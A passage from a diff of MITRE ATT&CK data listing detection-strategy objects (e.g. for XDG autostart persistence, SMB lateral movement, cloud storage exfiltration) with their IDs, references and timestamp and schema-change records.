+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--fbf8f0b2-3587-45c3-be8d-d495384075be",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0031",
+                            "external_id": "DET0031"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Invalid Code Signature Execution Detection via Metadata and Behavioral Context",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--bf6b3f42-a7a5-4e6d-840a-e892aa74916c",
+                        "x-mitre-analytic--35d9b6e6-aed8-4e9e-b6ee-e683d9c17fd0"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c265ea42-9c5a-41f0-9627-d7ac0063ec98",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0390",
+                            "external_id": "DET0390"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Linux Detection Strategy for T1547.013 - XDG Autostart Entries",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7bd7f602-0f85-4e96-bd40-ae4a6f490b32"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6034b1c9-84df-4349-b34f-957ad8ec34d3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0258",
+                            "external_id": "DET0258"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Linux Python Startup Hook Persistence via .pth and Customize Files (T1546.018)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e32ce63a-7c82-4115-8c50-e43113562132"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--21ad7ddc-77f6-422b-8e0c-c82e184e0ad0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0303",
+                            "external_id": "DET0303"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Local Account Enumeration Across Host Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6ffbdad6-3d60-452b-9e04-a8292d0125e9",
+                        "x-mitre-analytic--7b87b63c-0936-48b5-8017-47bf5561e6f9",
+                        "x-mitre-analytic--be680af0-8d5f-482c-9042-f5d4921e65f8",
+                        "x-mitre-analytic--d2bca034-2f97-4c64-ac30-e75d24886be7"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8c3d7757-f3ab-4c1d-95e1-f712cdecd5a3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0188",
+                            "external_id": "DET0188"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Local Storage Discovery via Drive Enumeration and Filesystem Probing",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9ffd3332-fcc0-440d-b717-ef98e140c543",
+                        "x-mitre-analytic--1a7052d7-84f1-4116-bdb1-49bbe8709e3d",
+                        "x-mitre-analytic--a98fc9c5-9c4c-47c5-a773-d68b523c7304",
+                        "x-mitre-analytic--478e6298-d012-4337-b2ed-0f8d4909ee05"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--16462629-5b36-4bb6-a565-de4df01f75d4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.670000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0292",
+                            "external_id": "DET0292"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Masquerading via Space After Filename - Behavioral Detection Strategy",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--778e2c18-2b26-4dd4-b4b2-3f8310d57a07",
+                        "x-mitre-analytic--773188c7-6191-4ba4-ad39-b67ed8578dd9"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.670000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--dbaaa57a-ef28-44c0-bc56-25bc20dc8f28",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0285",
+                            "external_id": "DET0285"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Multi-Event Behavioral Detection for DCOM-Based Remote Code Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0f94823c-ac95-48d8-9716-58f59d39974c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--04cbfa17-64a5-454d-8734-cead02ba5c43",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0530",
+                            "external_id": "DET0530"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Multi-Event Detection for SMB Admin Share Lateral Movement",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1a18402e-efb1-49c7-8615-dc907f838320"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--be288974-9b74-41c1-8c43-66aef169255a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0540",
+                            "external_id": "DET0540"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Multi-Platform Behavioral Detection for Compute Hijacking",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--92157361-c2f8-45e6-9624-38a3cdb44598",
+                        "x-mitre-analytic--45a34d76-16aa-45ac-9419-ffbc5d2e090d",
+                        "x-mitre-analytic--57595eb2-4d20-4d99-86b3-82064b3566cf",
+                        "x-mitre-analytic--7ac026eb-9a3b-49fe-b7ec-7261cb6d6191",
+                        "x-mitre-analytic--7a5e5aff-8395-4b4e-9072-dd765dae7d19"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1177cbb7-bc00-4a36-8774-d51b7b3c66e9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0484",
+                            "external_id": "DET0484"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Multi-Platform Cloud Storage Exfiltration Behavior Chain",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d9a1ace1-6307-4db7-925f-67057361e66a",
+                        "x-mitre-analytic--8226ce94-1f5b-4ab0-b0bc-92f1d225eaa4",
+                        "x-mitre-analytic--4eca5ae6-797c-41cb-bacd-dc7a6da58fb0"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e98d37af-727b-44a7-a72b-cdcf8a481a12",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0372",
+                            "external_id": "DET0372"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Multi-Platform Detection Strategy for T1678 - Delay Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--28e26a6a-e470-4f1c-845f-f2cbd816a1f7",
+                        "x-mitre-analytic--dcc422d4-90fc-4e2a-afd5-b4fbc3d6c4a1",
+                        "x-mitre-analytic--94871740-e9ae-458a-9d09-ef0f58c05905"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--99bdd6d6-ebef-40e2-83d2-2f39408c82e3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0562",
+                            "external_id": "DET0562"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Multi-Platform Execution Guardrails Environmental Validation Detection Strategy",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8089daf3-72b0-4714-b800-2856f27dc21c",
+                        "x-mitre-analytic--31027842-f02c-4bc3-8cd6-3e4b533da5ac",
+                        "x-mitre-analytic--65abf5f4-ddb9-4eac-a926-1bef5d6b5c63",
+                        "x-mitre-analytic--1cd8c844-575a-44be-9fee-80cd988dc781"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--682ddf59-6de3-4765-a1c0-09b539fa5d4f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0299",
+                            "external_id": "DET0299"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Multi-Platform File and Directory Permissions Modification Detection Strategy",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0669b8b5-8888-45aa-acf8-819dfb7d00a2",
+                        "x-mitre-analytic--e268a6cb-2264-473e-9683-fb0f33ecd793",
+                        "x-mitre-analytic--e564e2b8-542b-4003-a8b7-df9d3396f5b9",
+                        "x-mitre-analytic--13a1653f-3d4e-4a4f-9619-f8e8a97ec60d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2a464ecb-46ef-41f0-8ab6-a97a99ad0559",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0559",
+                            "external_id": "DET0559"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Multi-Platform Shutdown or Reboot Detection via Execution and Host Status Events",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--52b9bf67-304e-403f-9b81-4d4b9d974ad6",
+                        "x-mitre-analytic--f1a019df-12f0-442e-9b0e-b1a82352389b",
+                        "x-mitre-analytic--6b11c208-4dbf-4d52-9254-524e622c6250",
+                        "x-mitre-analytic--d076faf3-c5bd-4e5c-93a5-8408c9e80fe1",
+                        "x-mitre-analytic--9c70d5b3-8748-4f88-8fd8-95f79c73d250"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f18dee58-43be-41e4-85a3-c6820033ac0d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0392",
+                            "external_id": "DET0392"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Multi-Platform Software Discovery Behavior Chain",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c0bbe0a5-680f-487b-8f5f-27703efb52b7",
+                        "x-mitre-analytic--c14042f6-5ebd-42a2-b293-b2367b300fb6",
+                        "x-mitre-analytic--a1619e8f-10aa-46ab-8776-898e8c3d5b43",
+                        "x-mitre-analytic--3ccd6662-c579-494f-bbfa-ffc3530e3db2",
+                        "x-mitre-analytic--0119786d-ee1e-4857-b31a-3a43830e28e7"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--722d2e3d-c3ad-4878-bcef-ca3161465342",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0327",
+                            "external_id": "DET0327"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Multi-event Detection Strategy for RDP-Based Remote Logins and Post-Access Activity",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--63fcb4be-f5c2-47da-951d-cd1b4f1a2cc0"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--407286ed-c904-412a-9f2d-7426ea7304a4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
